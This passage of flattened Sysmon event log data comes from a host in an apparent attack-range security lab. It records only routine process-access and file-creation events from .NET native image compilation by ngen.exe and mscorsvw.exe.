Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000006489Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.125{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-9149-6005-4C02-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006488Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.110{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9149-6005-4C02-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:49.110{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-9149-6005-4C02-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006503Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:52.954{59A5CD1D-9149-6005-4C02-00000000A301}1244C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4dc-0\System.Activities.Presentation.dll2021-01-18 13:46:52.954 10341000x80000000000000006523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.969{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-5302-00000000A301}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.969{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-5302-00000000A301}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.969{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-5302-00000000A301}4508C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.907{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-5202-00000000A301}3820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.907{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-5202-00000000A301}3820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.907{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-5202-00000000A301}3820C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:53.844{59A5CD1D-914D-6005-5102-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\6d8-0\System.AddIn.Contract.dll2021-01-18 13:46:53.844 10341000x80000000000000006516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.813{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-5102-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.797{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-5102-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.797{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-5102-00000000A301}1752C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.766{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-5002-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.766{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-5002-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.766{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-5002-00000000A301}4900C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x80000000000000006510Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:46:53.688{59A5CD1D-914D-6005-4F02-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_64\Temp\4a4-0\System.AddIn.dll2021-01-18 13:46:53.688 10341000x80000000000000006509Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.219{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-4F02-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006508Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.204{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-4F02-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006507Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.204{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-4F02-00000000A301}1188C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006506Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.157{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914D-6005-4E02-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006505Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.157{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-914D-6005-4E02-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006504Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:53.157{59A5CD1D-90A0-6005-2E01-00000000A301}47125100C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914D-6005-4E02-00000000A301}5104C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6d87|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2066|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8b84|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+6ad3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+69a3|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+1f19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8198|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1d64|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+277a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2708|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.985{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914E-6005-5502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.969{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-914E-6005-5502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000006528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.969{59A5CD1D-90A0-6005-2E01-00000000A301}47124864C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{59A5CD1D-914E-6005-5502-00000000A301}4780C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d42|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a4e6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9ebd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9c4b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9b19|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+91db|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9168|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+8fc5|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000006527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:46:54.907{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-914E-6005-5402-00000000A301}2960C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 